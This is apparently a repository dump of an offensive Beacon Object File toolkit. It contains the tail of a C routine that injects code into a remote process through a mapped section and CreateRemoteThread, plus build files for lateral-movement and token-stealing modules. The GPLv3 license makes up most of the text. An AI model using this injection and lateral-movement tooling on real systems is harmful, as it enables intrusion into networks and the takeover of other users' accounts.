    NtStatus = NTDLL$NtUnmapViewOfSection(hLocalProcess, baseAddrLocal);
    if(NtStatus != NT_SUCCESS) {
        ULONG error = NTDLL$RtlNtStatusToDosError(NtStatus);
        BeaconPrintf(CALLBACK_OUTPUT, "Error unmapping view. Error: %d\n", error);
    }

    // Close section
    NtStatus = NTDLL$NtClose(hSection);
    if(NtStatus != NT_SUCCESS) {
        ULONG error = NTDLL$RtlNtStatusToDosError(NtStatus);
        BeaconPrintf(CALLBACK_OUTPUT, "Error closing handle. Error: %d\n", error);
    }

    // Create thread
    HANDLE hThread = KERNEL32$CreateRemoteThread(hRemoteProcess, NULL, 0, (LPTHREAD_START_ROUTINE) baseAddrRemote, NULL, 0, NULL);
    if(hThread == NULL)
        BeaconPrintf(CALLBACK_ERROR, "Error creating remote thread. Error: %d\n", KERNEL32$GetLastError());
    else
        BeaconPrintf(CALLBACK_OUTPUT, "New remote thread created");
}


================================================
FILE: Injection-BOF/inject_sec/libc.h
================================================
/*
* *grumble* *grumble* BOF files don't have access to a libc.
 * So, these are quick implementations of some stuff we need.
 */

// Source: Courtesy of Raphael Mudge
// https://github.com/rsmudge/CVE-2020-0796-BOF/blob/master/src/libc.c

void mycopy(char * dst, const char * src, int size) {
    int x;
    for (x = 0; x < size; x++) {
        *dst = *src;
        dst++;
        src++;
    }
}

char mylc(char a) {
    if (a >= 'A' && a <= 'Z') {
        return a + 32;
    }
    else {
        return a;
    }
}

BOOL mycmpi(char * a, char * b) {
    while (*a != 0 && *b != 0) {
        if (mylc(*a) != mylc(*b))
            return FALSE;
        a++;
        b++;
    }

    return TRUE;
}

================================================
FILE: LICENSE
================================================
                    GNU GENERAL PUBLIC LICENSE
                       Version 3, 29 June 2007

 Copyright (C) 2007 Free Software Foundation, Inc. <https://fsf.org/>
 Everyone is permitted to copy and distribute verbatim copies
 of this license document, but changing it is not allowed.

                            Preamble

  The GNU General Public License is a free, copyleft license for
software and other kinds of works.

  The licenses for most software and other practical works are designed
to take away your freedom to share and change the works.  By contrast,
the GNU General Public License is intended to guarantee your freedom to
share and change all versions of a program--to make sure it remains free
software for all its users.  We, the Free Software Foundation, use the
GNU General Public License for most of our software; it applies also to
any other work released this way by its authors.  You can apply it to
your programs, too.

  When we speak of free software, we are referring to freedom, not
price.  Our General Public Licenses are designed to make sure that you
have the freedom to distribute copies of free software (and charge for
them if you wish), that you receive source code or can get it if you
want it, that you can change the software or use pieces of it in new
free programs, and that you know you can do these things.

  To protect your rights, we need to prevent others from denying you
these rights or asking you to surrender the rights.  Therefore, you have
certain responsibilities if you distribute copies of the software, or if
you modify it: responsibilities to respect the freedom of others.

  For example, if you distribute copies of such a program, whether
gratis or for a fee, you must pass on to the recipients the same
freedoms that you received.  You must make sure that they, too, receive
or can get the source code.  And you must show them these terms so they
know their rights.

  Developers that use the GNU GPL protect your rights with two steps:
(1) assert copyright on the software, and (2) offer you this License
giving you legal permission to copy, distribute and/or modify it.

  For the developers' and authors' protection, the GPL clearly explains
that there is no warranty for this free software.  For both users' and
authors' sake, the GPL requires that modified versions be marked as
changed, so that their problems will not be attributed erroneously to
authors of previous versions.

  Some devices are designed to deny users access to install or run
modified versions of the software inside them, although the manufacturer
can do so.  This is fundamentally incompatible with the aim of
protecting users' freedom to change the software.  The systematic
pattern of such abuse occurs in the area of products for individuals to
use, which is precisely where it is most unacceptable.  Therefore, we
have designed this version of the GPL to prohibit the practice for those
products.  If such problems arise substantially in other domains, we
stand ready to extend this provision to those domains in future versions
of the GPL, as needed to protect the freedom of users.

  Finally, every program is threatened constantly by software patents.
States should not allow patents to restrict development and use of
software on general-purpose computers, but in those that do, we wish to
avoid the special danger that patents applied to a free program could
make it effectively proprietary.  To prevent this, the GPL assures that
patents cannot be used to render the program non-free.

  The precise terms and conditions for copying, distribution and
modification follow.

                       TERMS AND CONDITIONS

  0. Definitions.

  "This License" refers to version 3 of the GNU General Public License.

  "Copyright" also means copyright-like laws that apply to other kinds of
works, such as semiconductor masks.

  "The Program" refers to any copyrightable work licensed under this
License.  Each licensee is addressed as "you".  "Licensees" and
"recipients" may be individuals or organizations.

  To "modify" a work means to copy from or adapt all or part of the work
in a fashion requiring copyright permission, other than the making of an
exact copy.  The resulting work is called a "modified version" of the
earlier work or a work "based on" the earlier work.

  A "covered work" means either the unmodified Program or a work based
on the Program.

  To "propagate" a work means to do anything with it that, without
permission, would make you directly or secondarily liable for
infringement under applicable copyright law, except executing it on a
computer or modifying a private copy.  Propagation includes copying,
distribution (with or without modification), making available to the
public, and in some countries other activities as well.

  To "convey" a work means any kind of propagation that enables other
parties to make or receive copies.  Mere interaction with a user through
a computer network, with no transfer of a copy, is not conveying.

  An interactive user interface displays "Appropriate Legal Notices"
to the extent that it includes a convenient and prominently visible
feature that (1) displays an appropriate copyright notice, and (2)
tells the user that there is no warranty for the work (except to the
extent that warranties are provided), that licensees may convey the
work under this License, and how to view a copy of this License.  If
the interface presents a list of user commands or options, such as a
menu, a prominent item in the list meets this criterion.

  1. Source Code.

  The "source code" for a work means the preferred form of the work
for making modifications to it.  "Object code" means any non-source
form of a work.

  A "Standard Interface" means an interface that either is an official
standard defined by a recognized standards body, or, in the case of
interfaces specified for a particular programming language, one that
is widely used among developers working in that language.

  The "System Libraries" of an executable work include anything, other
than the work as a whole, that (a) is included in the normal form of
packaging a Major Component, but which is not part of that Major
Component, and (b) serves only to enable use of the work with that
Major Component, or to implement a Standard Interface for which an
implementation is available to the public in source code form.  A
"Major Component", in this context, means a major essential component
(kernel, window system, and so on) of the specific operating system
(if any) on which the executable work runs, or a compiler used to
produce the work, or an object code interpreter used to run it.

  The "Corresponding Source" for a work in object code form means all
the source code needed to generate, install, and (for an executable
work) run the object code and to modify the work, including scripts to
control those activities.  However, it does not include the work's
System Libraries, or general-purpose tools or generally available free
programs which are used unmodified in performing those activities but
which are not part of the work.  For example, Corresponding Source
includes interface definition files associated with source files for
the work, and the source code for shared libraries and dynamically
linked subprograms that the work is specifically designed to require,
such as by intimate data communication or control flow between those
subprograms and other parts of the work.

  The Corresponding Source need not include anything that users
can regenerate automatically from other parts of the Corresponding
Source.

  The Corresponding Source for a work in source code form is that
same work.

  2. Basic Permissions.

  All rights granted under this License are granted for the term of
copyright on the Program, and are irrevocable provided the stated
conditions are met.  This License explicitly affirms your unlimited
permission to run the unmodified Program.  The output from running a
covered work is covered by this License only if the output, given its
content, constitutes a covered work.  This License acknowledges your
rights of fair use or other equivalent, as provided by copyright law.

  You may make, run and propagate covered works that you do not
convey, without conditions so long as your license otherwise remains
in force.  You may convey covered works to others for the sole purpose
of having them make modifications exclusively for you, or provide you
with facilities for running those works, provided that you comply with
the terms of this License in conveying all material for which you do
not control copyright.  Those thus making or running the covered works
for you must do so exclusively on your behalf, under your direction
and control, on terms that prohibit them from making any copies of
your copyrighted material outside their relationship with you.

  Conveying under any other circumstances is permitted solely under
the conditions stated below.  Sublicensing is not allowed; section 10
makes it unnecessary.

  3. Protecting Users' Legal Rights From Anti-Circumvention Law.

  No covered work shall be deemed part of an effective technological
measure under any applicable law fulfilling obligations under article
11 of the WIPO copyright treaty adopted on 20 December 1996, or
similar laws prohibiting or restricting circumvention of such
measures.

  When you convey a covered work, you waive any legal power to forbid
circumvention of technological measures to the extent such circumvention
is effected by exercising rights under this License with respect to
the covered work, and you disclaim any intention to limit operation or
modification of the work as a means of enforcing, against the work's
users, your or third parties' legal rights to forbid circumvention of
technological measures.

  4. Conveying Verbatim Copies.

  You may convey verbatim copies of the Program's source code as you
receive it, in any medium, provided that you conspicuously and
appropriately publish on each copy an appropriate copyright notice;
keep intact all notices stating that this License and any
non-permissive terms added in accord with section 7 apply to the code;
keep intact all notices of the absence of any warranty; and give all
recipients a copy of this License along with the Program.

  You may charge any price or no price for each copy that you convey,
and you may offer support or warranty protection for a fee.

  5. Conveying Modified Source Versions.

  You may convey a work based on the Program, or the modifications to
produce it from the Program, in the form of source code under the
terms of section 4, provided that you also meet all of these conditions:

    a) The work must carry prominent notices stating that you modified
    it, and giving a relevant date.

    b) The work must carry prominent notices stating that it is
    released under this License and any conditions added under section
    7.  This requirement modifies the requirement in section 4 to
    "keep intact all notices".

    c) You must license the entire work, as a whole, under this
    License to anyone who comes into possession of a copy.  This
    License will therefore apply, along with any applicable section 7
    additional terms, to the whole of the work, and all its parts,
    regardless of how they are packaged.  This License gives no
    permission to license the work in any other way, but it does not
    invalidate such permission if you have separately received it.

    d) If the work has interactive user interfaces, each must display
    Appropriate Legal Notices; however, if the Program has interactive
    interfaces that do not display Appropriate Legal Notices, your
    work need not make them do so.

  A compilation of a covered work with other separate and independent
works, which are not by their nature extensions of the covered work,
and which are not combined with it such as to form a larger program,
in or on a volume of a storage or distribution medium, is called an
"aggregate" if the compilation and its resulting copyright are not
used to limit the access or legal rights of the compilation's users
beyond what the individual works permit.  Inclusion of a covered work
in an aggregate does not cause this License to apply to the other
parts of the aggregate.

  6. Conveying Non-Source Forms.

  You may convey a covered work in object code form under the terms
of sections 4 and 5, provided that you also convey the
machine-readable Corresponding Source under the terms of this License,
in one of these ways:

    a) Convey the object code in, or embodied in, a physical product
    (including a physical distribution medium), accompanied by the
    Corresponding Source fixed on a durable physical medium
    customarily used for software interchange.

    b) Convey the object code in, or embodied in, a physical product
    (including a physical distribution medium), accompanied by a
    written offer, valid for at least three years and valid for as
    long as you offer spare parts or customer support for that product
    model, to give anyone who possesses the object code either (1) a
    copy of the Corresponding Source for all the software in the
    product that is covered by this License, on a durable physical
    medium customarily used for software interchange, for a price no
    more than your reasonable cost of physically performing this
    conveying of source, or (2) access to copy the
    Corresponding Source from a network server at no charge.

    c) Convey individual copies of the object code with a copy of the
    written offer to provide the Corresponding Source.  This
    alternative is allowed only occasionally and noncommercially, and
    only if you received the object code with such an offer, in accord
    with subsection 6b.

    d) Convey the object code by offering access from a designated
    place (gratis or for a charge), and offer equivalent access to the
    Corresponding Source in the same way through the same place at no
    further charge.  You need not require recipients to copy the
    Corresponding Source along with the object code.  If the place to
    copy the object code is a network server, the Corresponding Source
    may be on a different server (operated by you or a third party)
    that supports equivalent copying facilities, provided you maintain
    clear directions next to the object code saying where to find the
    Corresponding Source.  Regardless of what server hosts the
    Corresponding Source, you remain obligated to ensure that it is
    available for as long as needed to satisfy these requirements.

    e) Convey the object code using peer-to-peer transmission, provided
    you inform other peers where the object code and Corresponding
    Source of the work are being offered to the general public at no
    charge under subsection 6d.

  A separable portion of the object code, whose source code is excluded
from the Corresponding Source as a System Library, need not be
included in conveying the object code work.

  A "User Product" is either (1) a "consumer product", which means any
tangible personal property which is normally used for personal, family,
or household purposes, or (2) anything designed or sold for incorporation
into a dwelling.  In determining whether a product is a consumer product,
doubtful cases shall be resolved in favor of coverage.  For a particular
product received by a particular user, "normally used" refers to a
typical or common use of that class of product, regardless of the status
of the particular user or of the way in which the particular user
actually uses, or expects or is expected to use, the product.  A product
is a consumer product regardless of whether the product has substantial
commercial, industrial or non-consumer uses, unless such uses represent
the only significant mode of use of the product.

  "Installation Information" for a User Product means any methods,
procedures, authorization keys, or other information required to install
and execute modified versions of a covered work in that User Product from
a modified version of its Corresponding Source.  The information must
suffice to ensure that the continued functioning of the modified object
code is in no case prevented or interfered with solely because
modification has been made.

  If you convey an object code work under this section in, or with, or
specifically for use in, a User Product, and the conveying occurs as
part of a transaction in which the right of possession and use of the
User Product is transferred to the recipient in perpetuity or for a
fixed term (regardless of how the transaction is characterized), the
Corresponding Source conveyed under this section must be accompanied
by the Installation Information.  But this requirement does not apply
if neither you nor any third party retains the ability to install
modified object code on the User Product (for example, the work has
been installed in ROM).

  The requirement to provide Installation Information does not include a
requirement to continue to provide support service, warranty, or updates
for a work that has been modified or installed by the recipient, or for
the User Product in which it has been modified or installed.  Access to a
network may be denied when the modification itself materially and
adversely affects the operation of the network or violates the rules and
protocols for communication across the network.

  Corresponding Source conveyed, and Installation Information provided,
in accord with this section must be in a format that is publicly
documented (and with an implementation available to the public in
source code form), and must require no special password or key for
unpacking, reading or copying.

  7. Additional Terms.

  "Additional permissions" are terms that supplement the terms of this
License by making exceptions from one or more of its conditions.
Additional permissions that are applicable to the entire Program shall
be treated as though they were included in this License, to the extent
that they are valid under applicable law.  If additional permissions
apply only to part of the Program, that part may be used separately
under those permissions, but the entire Program remains governed by
this License without regard to the additional permissions.

  When you convey a copy of a covered work, you may at your option
remove any additional permissions from that copy, or from any part of
it.  (Additional permissions may be written to require their own
removal in certain cases when you modify the work.)  You may place
additional permissions on material, added by you to a covered work,
for which you have or can give appropriate copyright permission.

  Notwithstanding any other provision of this License, for material you
add to a covered work, you may (if authorized by the copyright holders of
that material) supplement the terms of this License with terms:

    a) Disclaiming warranty or limiting liability differently from the
    terms of sections 15 and 16 of this License; or

    b) Requiring preservation of specified reasonable legal notices or
    author attributions in that material or in the Appropriate Legal
    Notices displayed by works containing it; or

    c) Prohibiting misrepresentation of the origin of that material, or
    requiring that modified versions of such material be marked in
    reasonable ways as different from the original version; or

    d) Limiting the use for publicity purposes of names of licensors or
    authors of the material; or

    e) Declining to grant rights under trademark law for use of some
    trade names, trademarks, or service marks; or

    f) Requiring indemnification of licensors and authors of that
    material by anyone who conveys the material (or modified versions of
    it) with contractual assumptions of liability to the recipient, for
    any liability that these contractual assumptions directly impose on
    those licensors and authors.

  All other non-permissive additional terms are considered "further
restrictions" within the meaning of section 10.  If the Program as you
received it, or any part of it, contains a notice stating that it is
governed by this License along with a term that is a further
restriction, you may remove that term.  If a license document contains
a further restriction but permits relicensing or conveying under this
License, you may add to a covered work material governed by the terms
of that license document, provided that the further restriction does
not survive such relicensing or conveying.

  If you add terms to a covered work in accord with this section, you
must place, in the relevant source files, a statement of the
additional terms that apply to those files, or a notice indicating
where to find the applicable terms.

  Additional terms, permissive or non-permissive, may be stated in the
form of a separately written license, or stated as exceptions;
the above requirements apply either way.

  8. Termination.

  You may not propagate or modify a covered work except as expressly
provided under this License.  Any attempt otherwise to propagate or
modify it is void, and will automatically terminate your rights under
this License (including any patent licenses granted under the third
paragraph of section 11).

  However, if you cease all violation of this License, then your
license from a particular copyright holder is reinstated (a)
provisionally, unless and until the copyright holder explicitly and
finally terminates your license, and (b) permanently, if the copyright
holder fails to notify you of the violation by some reasonable means
prior to 60 days after the cessation.

  Moreover, your license from a particular copyright holder is
reinstated permanently if the copyright holder notifies you of the
violation by some reasonable means, this is the first time you have
received notice of violation of this License (for any work) from that
copyright holder, and you cure the violation prior to 30 days after
your receipt of the notice.

  Termination of your rights under this section does not terminate the
licenses of parties who have received copies or rights from you under
this License.  If your rights have been terminated and not permanently
reinstated, you do not qualify to receive new licenses for the same
material under section 10.

  9. Acceptance Not Required for Having Copies.

  You are not required to accept this License in order to receive or
run a copy of the Program.  Ancillary propagation of a covered work
occurring solely as a consequence of using peer-to-peer transmission
to receive a copy likewise does not require acceptance.  However,
nothing other than this License grants you permission to propagate or
modify any covered work.  These actions infringe copyright if you do
not accept this License.  Therefore, by modifying or propagating a
covered work, you indicate your acceptance of this License to do so.

  10. Automatic Licensing of Downstream Recipients.

  Each time you convey a covered work, the recipient automatically
receives a license from the original licensors, to run, modify and
propagate that work, subject to this License.  You are not responsible
for enforcing compliance by third parties with this License.

  An "entity transaction" is a transaction transferring control of an
organization, or substantially all assets of one, or subdividing an
organization, or merging organizations.  If propagation of a covered
work results from an entity transaction, each party to that
transaction who receives a copy of the work also receives whatever
licenses to the work the party's predecessor in interest had or could
give under the previous paragraph, plus a right to possession of the
Corresponding Source of the work from the predecessor in interest, if
the predecessor has it or can get it with reasonable efforts.

  You may not impose any further restrictions on the exercise of the
rights granted or affirmed under this License.  For example, you may
not impose a license fee, royalty, or other charge for exercise of
rights granted under this License, and you may not initiate litigation
(including a cross-claim or counterclaim in a lawsuit) alleging that
any patent claim is infringed by making, using, selling, offering for
sale, or importing the Program or any portion of it.

  11. Patents.

  A "contributor" is a copyright holder who authorizes use under this
License of the Program or a work on which the Program is based.  The
work thus licensed is called the contributor's "contributor version".

  A contributor's "essential patent claims" are all patent claims
owned or controlled by the contributor, whether already acquired or
hereafter acquired, that would be infringed by some manner, permitted
by this License, of making, using, or selling its contributor version,
but do not include claims that would be infringed only as a
consequence of further modification of the contributor version.  For
purposes of this definition, "control" includes the right to grant
patent sublicenses in a manner consistent with the requirements of
this License.

  Each contributor grants you a non-exclusive, worldwide, royalty-free
patent license under the contributor's essential patent claims, to
make, use, sell, offer for sale, import and otherwise run, modify and
propagate the contents of its contributor version.

  In the following three paragraphs, a "patent license" is any express
agreement or commitment, however denominated, not to enforce a patent
(such as an express permission to practice a patent or covenant not to
sue for patent infringement).  To "grant" such a patent license to a
party means to make such an agreement or commitment not to enforce a
patent against the party.

  If you convey a covered work, knowingly relying on a patent license,
and the Corresponding Source of the work is not available for anyone
to copy, free of charge and under the terms of this License, through a
publicly available network server or other readily accessible means,
then you must either (1) cause the Corresponding Source to be so
available, or (2) arrange to deprive yourself of the benefit of the
patent license for this particular work, or (3) arrange, in a manner
consistent with the requirements of this License, to extend the patent
license to downstream recipients.  "Knowingly relying" means you have
actual knowledge that, but for the patent license, your conveying the
covered work in a country, or your recipient's use of the covered work
in a country, would infringe one or more identifiable patents in that
country that you have reason to believe are valid.

  If, pursuant to or in connection with a single transaction or
arrangement, you convey, or propagate by procuring conveyance of, a
covered work, and grant a patent license to some of the parties
receiving the covered work authorizing them to use, propagate, modify
or convey a specific copy of the covered work, then the patent license
you grant is automatically extended to all recipients of the covered
work and works based on it.

  A patent license is "discriminatory" if it does not include within
the scope of its coverage, prohibits the exercise of, or is
conditioned on the non-exercise of one or more of the rights that are
specifically granted under this License.  You may not convey a covered
work if you are a party to an arrangement with a third party that is
in the business of distributing software, under which you make payment
to the third party based on the extent of your activity of conveying
the work, and under which the third party grants, to any of the
parties who would receive the covered work from you, a discriminatory
patent license (a) in connection with copies of the covered work
conveyed by you (or copies made from those copies), or (b) primarily
for and in connection with specific products or compilations that
contain the covered work, unless you entered into that arrangement,
or that patent license was granted, prior to 28 March 2007.

  Nothing in this License shall be construed as excluding or limiting
any implied license or other defenses to infringement that may
otherwise be available to you under applicable patent law.

  12. No Surrender of Others' Freedom.

  If conditions are imposed on you (whether by court order, agreement or
otherwise) that contradict the conditions of this License, they do not
excuse you from the conditions of this License.  If you cannot convey a
covered work so as to satisfy simultaneously your obligations under this
License and any other pertinent obligations, then as a consequence you may
not convey it at all.  For example, if you agree to terms that obligate you
to collect a royalty for further conveying from those to whom you convey
the Program, the only way you could satisfy both those terms and this
License would be to refrain entirely from conveying the Program.

  13. Use with the GNU Affero General Public License.

  Notwithstanding any other provision of this License, you have
permission to link or combine any covered work with a work licensed
under version 3 of the GNU Affero General Public License into a single
combined work, and to convey the resulting work.  The terms of this
License will continue to apply to the part which is the covered work,
but the special requirements of the GNU Affero General Public License,
section 13, concerning interaction through a network will apply to the
combination as such.

  14. Revised Versions of this License.

  The Free Software Foundation may publish revised and/or new versions of
the GNU General Public License from time to time.  Such new versions will
be similar in spirit to the present version, but may differ in detail to
address new problems or concerns.

  Each version is given a distinguishing version number.  If the
Program specifies that a certain numbered version of the GNU General
Public License "or any later version" applies to it, you have the
option of following the terms and conditions either of that numbered
version or of any later version published by the Free Software
Foundation.  If the Program does not specify a version number of the
GNU General Public License, you may choose any version ever published
by the Free Software Foundation.

  If the Program specifies that a proxy can decide which future
versions of the GNU General Public License can be used, that proxy's
public statement of acceptance of a version permanently authorizes you
to choose that version for the Program.

  Later license versions may give you additional or different
permissions.  However, no additional obligations are imposed on any
author or copyright holder as a result of your choosing to follow a
later version.

  15. Disclaimer of Warranty.

  THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY
APPLICABLE LAW.  EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT
HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY
OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO,
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
PURPOSE.  THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM
IS WITH YOU.  SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF
ALL NECESSARY SERVICING, REPAIR OR CORRECTION.

  16. Limitation of Liability.

  IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS
THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY
GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE
USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF
DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD
PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS),
EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF
SUCH DAMAGES.

  17. Interpretation of Sections 15 and 16.

  If the disclaimer of warranty and limitation of liability provided
above cannot be given local legal effect according to their terms,
reviewing courts shall apply local law that most closely approximates
an absolute waiver of all civil liability in connection with the
Program, unless a warranty or assumption of liability accompanies a
copy of the Program in return for a fee.

                     END OF TERMS AND CONDITIONS

            How to Apply These Terms to Your New Programs

  If you develop a new program, and you want it to be of the greatest
possible use to the public, the best way to achieve this is to make it
free software which everyone can redistribute and change under these terms.

  To do so, attach the following notices to the program.  It is safest
to attach them to the start of each source file to most effectively
state the exclusion of warranty; and each file should have at least
the "copyright" line and a pointer to where the full notice is found.

    <one line to give the program's name and a brief idea of what it does.>
    Copyright (C) <year>  <name of author>

    This program is free software: you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation, either version 3 of the License, or
    (at your option) any later version.

    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License
    along with this program.  If not, see <https://www.gnu.org/licenses/>.

Also add information on how to contact you by electronic and paper mail.

  If the program does terminal interaction, make it output a short
notice like this when it starts in an interactive mode:

    <program>  Copyright (C) <year>  <name of author>
    This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
    This is free software, and you are welcome to redistribute it
    under certain conditions; type `show c' for details.

The hypothetical commands `show w' and `show c' should show the appropriate
parts of the General Public License.  Of course, your program's commands
might be different; for a GUI interface, you would use an "about box".

  You should also get your employer (if you work as a programmer) or school,
if any, to sign a "copyright disclaimer" for the program, if necessary.
For more information on this, and how to apply and follow the GNU GPL, see
<https://www.gnu.org/licenses/>.

  The GNU General Public License does not permit incorporating your program
into proprietary programs.  If your program is a subroutine library, you
may consider it more useful to permit linking proprietary applications with
the library.  If this is what you want to do, use the GNU Lesser General
Public License instead of this License.  But first, please read
<https://www.gnu.org/licenses/why-not-lgpl.html>.


================================================
FILE: LateralMovement-BOF/CMakeLists.txt
================================================
cmake_minimum_required(VERSION 3.16)
#project(LateralMovement-BOF C CXX)

set(CMAKE_C_STANDARD 99)
set(CMAKE_CXX_STANDARD 11)

# Include directories (main _include is at root level)
include_directories(${CMAKE_SOURCE_DIR}/_include)

# Source files
set(PSEXEC_SOURCES psexec/psexec.c)
set(SCSHELL_SOURCES scshell/scshell.c)
set(TOKEN_MAKE_SOURCES token_make/token_make.c)
set(TOKEN_STEAL_SOURCES token_steal/token_steal.c)
set(WINRM_SOURCES winrm-client/winrm.cpp)

# Compiler flags
set(CMAKE_C_FLAGS "${CMAKE_C_FLAGS} -Os -w -Wno-int-conversion -Wno-incompatible-pointer-types")
set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -Os -w")
set(CMAKE_C_FLAGS_RELEASE "${CMAKE_C_FLAGS_RELEASE} -s")
set(CMAKE_CXX_FLAGS_RELEASE "${CMAKE_CXX_FLAGS_RELEASE} -s")

# Object file targets
add_library(psexec OBJECT ${PSEXEC_SOURCES})
add_library(scshell OBJECT ${SCSHELL_SOURCES})
add_library(token_make OBJECT ${TOKEN_MAKE_SOURCES})
add_library(token_steal OBJECT ${TOKEN_STEAL_SOURCES})

add_library(winrm OBJECT ${WINRM_SOURCES})
target_compile_options(winrm PRIVATE
    -masm=intel
    -nostdlib
    -Wno-nonnull
    -fno-asynchronous-unwind-tables
    -fno-exceptions
    -fno-rtti
)

# Create _bin directory
file(MAKE_DIRECTORY ${CMAKE_CURRENT_SOURCE_DIR}/_bin)

# Custom commands to copy object files to _bin
add_custom_target(copy_psexec ALL
    COMMAND ${CMAKE_COMMAND} -E copy $<TARGET_OBJECTS:psexec> ${CMAKE_CURRENT_SOURCE_DIR}/_bin/psexec.x64.o
    DEPENDS psexec
    COMMENT "Copying psexec object file"
)

add_custom_target(copy_scshell ALL
    COMMAND ${CMAKE_COMMAND} -E copy $<TARGET_OBJECTS:scshell> ${CMAKE_CURRENT_SOURCE_DIR}/_bin/scshell.x64.o
    DEPENDS scshell
    COMMENT "Copying scshell object file"
)

add_custom_target(copy_token_make ALL
    COMMAND ${CMAKE_COMMAND} -E copy $<TARGET_OBJECTS:token_make> ${CMAKE_CURRENT_SOURCE_DIR}/_bin/token_make.x64.o
    DEPENDS token_make
    COMMENT "Copying token_make object file"
)

add_custom_target(copy_token_steal ALL
    COMMAND ${CMAKE_COMMAND} -E copy $<TARGET_OBJECTS:token_steal> ${CMAKE_CURRENT_SOURCE_DIR}/_bin/token_steal.x64.o
    DEPENDS token_steal
    COMMENT "Copying token_steal object file"
)

add_custom_target(copy_winrm ALL
    COMMAND ${CMAKE_COMMAND} -E copy $<TARGET_OBJECTS:winrm> ${CMAKE_CURRENT_SOURCE_DIR}/_bin/winrm.x64.o
    DEPENDS winrm
    COMMENT "Copying winrm object file"
)


================================================
FILE: LateralMovement-BOF/Makefile
================================================
CC64 = x86_64-w64-mingw32-gcc
CC86 = i686-w64-mingw32-gcc
CPP64 = x86_64-w64-mingw32-g++
CPP86 = i686-w64-mingw32-g++
STRIP64 = x86_64-w64-mingw32-strip --strip-unneeded
STRIP86 = i686-w64-mingw32-strip --strip-unneeded
CFLAGS = -I ../_include -w -Wno-int-conversion -Wno-incompatible-pointer-types -Os -DBOF -s -c

all: bof

bof: clean
	@(mkdir _bin 2>/dev/null) && echo 'creating _bin directory' || echo '_bin directory exists'
	# 64-bit builds
	@($(CC64) $(CFLAGS) psexec/psexec.c -o _bin/psexec.x64.o && $(STRIP64) _bin/psexec.x64.o) && echo '[+] psexec' || echo '[!] psexec'
	@($(CC64) $(CFLAGS) scshell/scshell.c -o _bin/scshell.x64.o && $(STRIP64) _bin/scshell.x64.o) && echo '[+] scshell' || echo '[!] scshell'
	@($(CC64) $(CFLAGS) token_make/token_make.c -o _bin/token_make.x64.o && $(STRIP64) _bin/token_make.x64.o) && echo '[+] token_make' || echo '[!] token_make'
	@($(CC64) $(CFLAGS) token_steal/token_steal.c -o _bin/token_steal.x64.o && $(STRIP64) _bin/token_steal.x64.o) && echo '[+] token_steal' || echo '[!] token_steal'
	@($(CC64) $(CFLAGS) runas/runas.c -o _bin/runas.x64.o && $(STRIP64) _bin/runas.x64.o) && echo '[+] runas' || echo '[!] runas'
	@($(CC64) $(CFLAGS) runas_sess_IHxExec/ihxexec.c -o _bin/runas_sess_ihxexec.x64.o && $(STRIP64) _bin/runas_sess_ihxexec.x64.o) && echo '[+] runas_sess_ihxexec' || echo '[!] runas_sess_ihxexec'
	@($(CPP64) -I ../_include -w -Os -s -c -masm=intel -nostdlib -Wno-nonnull -fno-asynchronous-unwind-tables -fno-exceptions -fno-rtti winrm-client/winrm.cpp -o _bin/winrm.x64.o && $(STRIP64) _bin/winrm.x64.o) && echo '[+] winrm' || echo '[!] winrm'

	# 32-bit builds
	@($(CC86) $(CFLAGS) psexec/psexec.c            -o _bin/psexec.x32.o      && $(STRIP86) _bin/psexec.x32.o)      && echo '[+] psexec (x32)'      || echo '[!] psexec (x32)'
	@($(CC86) $(CFLAGS) scshell/scshell.c          -o _bin/scshell.x32.o     && $(STRIP86) _bin/scshell.x32.o)     && echo '[+] scshell (x32)'     || echo '[!] scshell (x32)'
	@($(CC86) $(CFLAGS) token_make/token_make.c    -o _bin/token_make.x32.o  && $(STRIP86) _bin/token_make.x32.o)  && echo '[+] token_make (x32)'  || echo '[!] token_make (x32)'
	@($(CC86) $(CFLAGS) token_steal/token_steal.c  -o _bin/token_steal.x32.o && $(STRIP86) _bin/token_steal.x32.o) && echo '[+] token_steal (x32)' || echo '[!] token_steal (x32)'
	@($(CC86) $(CFLAGS) runas/runas.c              -o _bin/runas.x32.o       && $(STRIP86) _bin/runas.x32.o)       && echo '[+] runas (x32)'       || echo '[!] runas (x32)'
	@#($(CC64) $(CFLAGS) runas_sess_IHxExec/ihxexec.c -o _bin/runas_sess_ihxexec.x64.o && $(STRIP64) _bin/runas_sess_ihxexec.x64.o) && echo '[+] runas_sess_ihxexec' || echo '[!] runas_sess_ihxexec'
	@#($(CPP86) -I ../_include -w -Os -s -c -masm=intel -nostdlib -Wno-nonnull -fno-asynchronous-unwind-tables -fno-exceptions -fno-rtti winrm-client/winrm.cpp -o _bin/winrm.x32.o && $(STRIP86) _bin/winrm.x32.o) && echo '[+] winrm (x32)' || echo '[!] winrm (x32)'

clean:
	@(rm -rf _bin)


================================================
FILE: LateralMovement-BOF/README.md
================================================
# LateralMovement-BOF

BOFs kit for lateral movements

